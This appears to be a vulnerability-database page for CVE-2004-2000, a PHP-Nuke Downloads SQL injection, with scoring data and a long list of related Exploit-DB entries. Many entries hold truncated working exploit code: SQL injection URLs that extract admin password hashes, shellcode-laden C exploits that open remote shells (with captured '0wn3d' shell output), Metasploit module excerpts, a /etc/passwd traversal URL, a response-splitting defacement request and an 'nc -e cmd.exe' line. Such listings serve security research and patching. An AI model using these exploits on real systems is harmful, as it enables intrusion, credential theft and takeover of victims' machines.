CVE-2004-2000
published 2004-05-05CVE-2004-2000: SQL injection vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to execute arbitrary SQL via the (1) orderby or (2) sid…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.87%
76.7th percentile
SQL injection vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to execute arbitrary SQL via the (1) orderby or (2) sid parameters to modules.php.
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6979-7cwq-22m2: SQL injection vulnerability in the Downloads module in Php-Nuke 6
ghsa_unreviewed·2022-04-29
CVE-2004-2000 [HIGH] GHSA-6979-7cwq-22m2: SQL injection vulnerability in the Downloads module in Php-Nuke 6
SQL injection vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to execute arbitrary SQL via the (1) orderby or (2) sid parameters to modules.php.
Red Hat
security flaw
vendor_redhat·2000-09-01·CVSS 5.0
CVE-2004-0175 [MEDIUM] security flaw
security flaw
Directory traversal vulnerability in scp for OpenSSH before 3.4p1 allows remote malicious servers to overwrite arbitrary files. NOTE: this may be a rediscovery of CVE-2000-0992.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Red Hat
CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
vendor_redhat·CVSS 9.3
CVE-2006-1017 [CRITICAL] CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues being security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
No detection rules found.
Exploit-DB
RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)
exploitdb·2011-12-02
CVE-2004-2111 RhinoSoft Serv-U FTPd Server < 4.2 - Remote Buffer Overflow (Metasploit)
RhinoSoft Serv-U FTPd Server 'Serv-U FTP Server %q{
This module exploits a stack buffer overflow in the site chmod command
in versions of Serv-U FTP Server prior to 4.2.
You must have valid credentials to trigger this vulnerability. Exploitation
also leaves the service in a non-functional state.
},
'Author' => 'thelightcosine ',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-2111'],
[ 'BID', '9483'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-4 EN', {
'Ret' => 0x750212bc, #WS2HELP.DLL
'Offset' => 396 } ],
[ 'Windows XP SP0-1 EN', {
'Ret' => 0x71aa388f,
Exploit-DB
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
exploitdb·2010-09-20
CVE-2004-1080 Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
---
##
# $Id: ms04_045_wins.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft WINS Service Memory Overwrite',
'Description' => %q{
This module exploits an arbitrary memory write flaw in the
WINS service. This exploit has been tested against Windows
2000 only.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2004-1080'],
[ 'OSVDB', '12378'],
[ 'BID', '11763'],
[ '
Exploit-DB
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
exploitdb·2010-07-03
CVE-2004-0206 Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
---
##
# $Id: ms04_031_netdde.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft NetDDE Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetDDE service, which is the
precursor to the DCOM interface. This exploit effects only operating systems
released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim
that this vulnerability can be exploited without authentication, the N
Exploit-DB
IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2004-0297 IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow (Metasploit)
---
##
# $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IMail LDAP Service Buffer Overflow',
'Description' => %q{
This exploits a buffer overflow in the LDAP service that is
part of the IMail product. This module was tested against
version 7.10 and 8.5, both running on Windows 2000.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'References' =>
[
[ 'CVE', '2004-0297'],
[ 'OSVDB'
Exploit-DB
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
exploitdb·2009-01-27
CVE-2004-0964 Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
---
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";
# milw0rm.com [2009-01-27]
Exploit-DB
ClanLite 2.x - SQL Injection / Cross-Site Scripting
exploitdb·2008-05-12
CVE-2008-5215 ClanLite 2.x - SQL Injection / Cross-Site Scripting
ClanLite 2.x - SQL Injection / Cross-Site Scripting
---
########## CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ##############################
ClanLite V2 SQL inj. & XSS
dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005
dork: Themed By Ray © 2003, 2004 iOptional
readme script
/****************************************************************************
* Fichier : *
* Copyright : (C) 2004 ClanLite V2 *
* Email : [email protected] *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
******************************************************************
Exploit-DB
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
exploitdb·2008-03-07
CVE-2008-0118 Microsoft Office 2000/2003/2004/XP - File Memory Corruption
Microsoft Office 2000/2003/2004/XP - File Memory Corruption
---
source: https://www.securityfocus.com/bid/28146/info
Microsoft Office is prone to a remote memory-corruption vulnerability.
An attacker could exploit this issue by enticing a victim to open a malicious Office file.
Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz
Exploit-DB
PHP-Nuke Downloads Module - 'sid' SQL Injection
exploitdb·2008-02-21
CVE-2004-2000 PHP-Nuke Downloads Module - 'sid' SQL Injection
PHP-Nuke Downloads Module - 'sid' SQL Injection
---
source: https://www.securityfocus.com/bid/27932/info
The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202
http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%20adm
Exploit-DB
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
exploitdb·2006-07-06
CVE-2006-3431 Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
---
source: https://www.securityfocus.com/bid/18872/info
Microsoft Excel is prone to a remote code-execution vulnerability.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users.
A proof-of-concept malicious code named 'Trojan.Hongmosa' is actively exploiting this vulnerability, which results in crashing Excel running on Simplified Chinese, Traditional Chinese, Japanese, or Korean Windows.
Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vect
Exploit-DB
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
exploitdb·2005-06-29
CVE-2005-0059 Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
Microsoft Windows Message Queuing - Remote Buffer Overflow Universal (MS05-017) (v.0.3)
---
/* HOD-ms05017-msmq-expl.c: 2005-06-28: PUBLIC v.0.3
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-017) Message Queuing Buffer Overflow Vulnerability
* Universal Exploit
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows XP SP1
* - Windows 2000 SP4
* - Windows 2000 SP3
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in Message Queuing
* that could allow an attacker who successfully exploited this
* vulnerability to take complete control of the affected system.
*
* ---
Exploit-DB
Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow
exploitdb·2005-04-13
CVE-2004-1774 Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow
Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow
---
source: https://www.securityfocus.com/bid/13145/info
Oracle Database is reported prone to a buffer overflow vulnerability.
Reportedly this issue affects the 'MDSYS.MD2.SDO_CODE_SIZE' procedure. An attacker can supply excessive data to an affected routine resulting in overflowing a destination buffer. This issue can be leveraged to execute arbitrary code and gain 'SYSDBA' privileges.
It is conjectured that authentication is required to carry out an attack.
This BID will be updated when more information is available.
/*
Advanced SQL Injection in Oracle databases
Exploit for the buffer overflow vulnerability in procedure MDSYS.MD2.SDO_CODE_SIZE
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
F
Exploit-DB
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)
exploitdb·2005-04-12
CVE-2004-1080 Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)
---
/*
Windows Internet Name Service (WINS)
Remote Heap Buffer Overflow
Advisory credits:
Nicolas Waisman of Immunity Inc. (www.immunitysec.com)
Advisory link:
immunitysec.com/downloads/instantanea.pdf
Fix:
support.microsoft.com/kb/870763 (MS04-045)
Exploit method:
PEB (RtlEnterCriticalSection)
Tested Working:
Win2k SP4 Server ENGLISH (should be all langages, not sure)
Win2k SP4 Advanced Server ENGLISH (should be all langages, not sure)
(KB870763 removed!)
Note:
A HAT-SQUAD view on this hole; exploitable and remaining critic for Windows 2000.
May need update for Windows 2003 due to the different
structure of wins.exe in it but the bug remain exploitable
with no KB870763 of course....
If you look closely at my co
Exploit-DB
Microsoft Windows Server 2000 - WINS Remote Code Execution
exploitdb·2004-12-31
CVE-2004-0567 Microsoft Windows Server 2000 - WINS Remote Code Execution
Microsoft Windows Server 2000 - WINS Remote Code Execution
---
/*************************************************************/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by: zuc */
/* works on Windows 2000 SP3/SP4 probably every language */
/*************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\
Exploit-DB
Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
exploitdb·2004-12-23
CVE-2004-1306 Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow
---
source: https://www.securityfocus.com/bid/12091/info
Microsoft Windows is prone to an integer overflow vulnerability. This issue exists in 'winhlp32.exe' and is exposed when a malformed phrase compressed Windows Help file (.hlp) is processed by the program.
Successful exploitation may allow execution of arbitrary code in the context of the user that opens the malicious Help file. The Help file may originate from an external or untrusted source, so this vulnerability is considered remote in nature.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25049.gz
Exploit-DB
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
exploitdb·2004-11-29
CVE-2004-1135 Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"
Exploit-DB
Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal
exploitdb·2004-11-25
CVE-2000-0187 Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal
Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal
---
Example:
http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
# milw0rm.com [2004-11-25]
Exploit-DB
DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
exploitdb·2004-11-21
CVE-2004-1533 DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
---
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";
sleep(1);
print $socket "USER " . "A" x 1023;
close $socket;
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (2)
exploitdb·2004-11-16
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (2)
MiniShare 1.4.1 - Remote Buffer Overflow (2)
---
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\
Exploit-DB
TABS MailCarrier 2.51 - Remote Buffer Overflow
exploitdb·2004-11-16
CVE-2004-1638 TABS MailCarrier 2.51 - Remote Buffer Overflow
TABS MailCarrier 2.51 - Remote Buffer Overflow
---
/* Remote exploit for MailCarrier by NoPh0BiA,
no@0x00:~/Exploits/MailCarrier$ ./mailcarried-exploit 192.168.0.1
**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**
[x] Connected to: 192.168.0.1 PORT: 25
[x] Sending evil buffer..done.
[x] Trying to connect to port 31337..
[x] Connected to: 192.168.0.1 PORT: 31337
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greets to NtWaK0,schap,kane,kamalo,foufs :P
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 25
#define RPORT 31337
#define RET "\xD3\x39\xD3\x77" /*win2k adv server sp4*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x8
Exploit-DB
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-11-07
CVE-2004-1626 Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET "\xC7\xF2\xC8\x77" /*win
Exploit-DB
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
exploitdb·2004-10-26
CVE-2004-1638 TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow
---
#########################################################
# MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 23 Oct 2004 - muts #
#########################################################
# D:\BO>mailcarrier-2.5-EHLO.py #
#########################################################
# D:\data\tools>nc -v 192.168.1.32 101 #
# localhost [127.0.0.1] 101 (hostname) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\WINNT\system32> #
#########################################################
import struct
import socket
print "\n\n###############################################"
print "\nMailCarrier 2.51 SMTP EHLO / HELO
Exploit-DB
best software SalesLogix 2000.0 - Multiple Vulnerabilities
exploitdb·2004-10-18
CVE-2004-1612 best software SalesLogix 2000.0 - Multiple Vulnerabilities
best software SalesLogix 2000.0 - Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/11450/info
Best Software SalesLogix is affected by multiple vulnerabilities. These issues are due to design errors that reveal sensitive information, access control validation issues that allow unauthorized access and input validation issues facilitating SQL injection attacks.
An attacker may leverage these issues to manipulate and disclose database contents through SQL injection attacks, steal authentication credentials due to information disclosure vulnerabilities and bypass authentication to gain administrator access to the server.
#!/usr/bin/perl
#
# Proof of concept exploit: Arbitrary file creation for SLX server 6.1
#
# Written by Carl Livitt, Agenda Security Services, June 2
Exploit-DB
Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
exploitdb·2004-09-16
CVE-2004-1687 Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
Snitz Forums 2000 - 'down.asp' HTTP Response Splitting
---
source: https://www.securityfocus.com/bid/11201/info
Snitz Forums is reported prone to a HTTP response splitting vulnerability. The issue exists in a parameter of the 'down.asp' script. The issue presents itself due to a flaw in the affected script that allows an attacker to
manipulate how GET requests are handled.
A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted.
POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134
location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}
(replace curly braces with less than and greater than symbols)
Exploit-DB
Trillian 0.74i MSN Module - Remote Buffer Overflow
exploitdb·2004-09-08
CVE-2004-1666 Trillian 0.74i MSN Module - Remote Buffer Overflow
Trillian 0.74i MSN Module - Remote Buffer Overflow
---
/*
Cerulean Studios Trillian 0.74i Buffer Overflow in MSN module exploit
created by Komrade - unsecure altervista org
Written for Windows 2000 / Windows XP.
Tested on Windows XP Professional sp0.
This exploit spawn a shell on port 5555, you have just to execute the
program and connect to port 5555.
*/
#include
#include
#include
#include
int main(int argc,char **argv){
char shellcode[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x66\x01\x80\x34\x0A\x99\xE2\xFA\xEB"
"\x05\xE8\xEB\xFF\xFF\xFF\x70\x99\x98\x99\x99\xC3\xFD\x12\xD8\xA9\x12"
"\xD9\x95\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12"
"\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8"
"\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1
Exploit-DB
WFTPD Pro Server 3.21 - MLST Remote Denial of Service
exploitdb·2004-08-31
CVE-2004-1642 WFTPD Pro Server 3.21 - MLST Remote Denial of Service
WFTPD Pro Server 3.21 - MLST Remote Denial of Service
---
/*
*
* wftpd.c - WFTPD Pro Server 3.21 MLST DoS Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author : lion
* : lion cnhonker net
* : www cnhonker com
* Date : 2004-08-30
*
*/
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#define FTPPORT 21
#define BUFFSIZE 204800
#define OVERFLOWSIZE 220
#define SIZE 2048
// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);
int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];
void main(int argc, char *argv[])
{
WSADATA wsa;
uns
Exploit-DB
Titan FTP Server - Long Command Heap Overflow
exploitdb·2004-08-31
CVE-2004-1641 Titan FTP Server - Long Command Heap Overflow
Titan FTP Server - Long Command Heap Overflow
---
/*
*
* titanftp.c - TiTan FTP Server Long Command Heap Overflow PoC Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author : lion
* : lion cnhonker net
* : www cnhonker com
* Date : 2004-08-30
*
*/
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#define FTPPORT 21
#define BUFFSIZE 204800
#define OVERFLOWSIZE 20480
#define SIZE 2048
// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);
int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];
void main(int argc, char *argv[])
{
WSA
Exploit-DB
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
exploitdb·2004-08-11
CVE-2004-1714 Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun
---
source: https://www.securityfocus.com/bid/10915/info
It is reported that BlackICE PC Protection is prone to a local buffer overrun when handling excessive input in certain configuration directives parsed from the firewall.ini file included with the software.
It is reported that when the system is restarted, and the affected software reads the malicious firewall.ini file both the blackice.exe and blackd.exe executables will crash.
REJECT, 138, default, 1999-07-22 20:26:53, AAAAAAAAAAAAAAAAA.... , 2000,
unknown
(Aprox 1000 A's)
Exploit-DB
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
exploitdb·2004-07-20
CVE-2004-0213 Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)
---
/******************************************************************************************
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4****
** [Crpt] Utility Manager exploit v2.666 modified by kralor [Crpt] **
** It gets system language and sets windows names to work on any win2k :P **
** Feel free to add other languages :) **
** v2.666: added autonomous (allinone) remote exploitation system ;) **
** It can be executed through poor cmd.exe shells (like nc -lp 666 -e cmd.exe from a **
** normal user account). Must be called with an argument (any argument) **
** You know where we are.. **
*****C*****O*****R*****O******M******P*****U*******T*******E******R*****2***0***0***4***
Exploit-DB
Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
exploitdb·2004-07-18
CVE-2004-0212 Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
Microsoft Windows Task Scheduler (XP/2000) - '.job' (MS04-022)
---
//*************************************************************
// Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022)
// Proof-of-Concept Exploit for English WinXP SP1
// 15 Jul 2004
//
// Running this will create a file "j.job". When explorer.exe or any
// file-open dialog box accesses the directory containing this file,
// notepad.exe will be spawn.
//
// Greetz: snooq, sk and all guys at SIG^2 www security org sg
//
//*************************************************************
#include
#include
unsigned char jobfile[] =
"\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\
Exploit-DB
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
exploitdb·2004-07-17
CVE-2004-0213 Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)
---
/* Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit (MS04-020)
*
* Tested on windows 2k sp4 CN,NT/XP/2003 NOT TESTED
*
* Posixexp.c By bkbll (bkbll cnhonker net,bkbll tom com) www cnhonker com
*
* 2004/07/16
*
* thanks to eyas xfocus org
*
*
C:\>whoami
VITUALWIN2K\test
C:\>posixexp
Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1
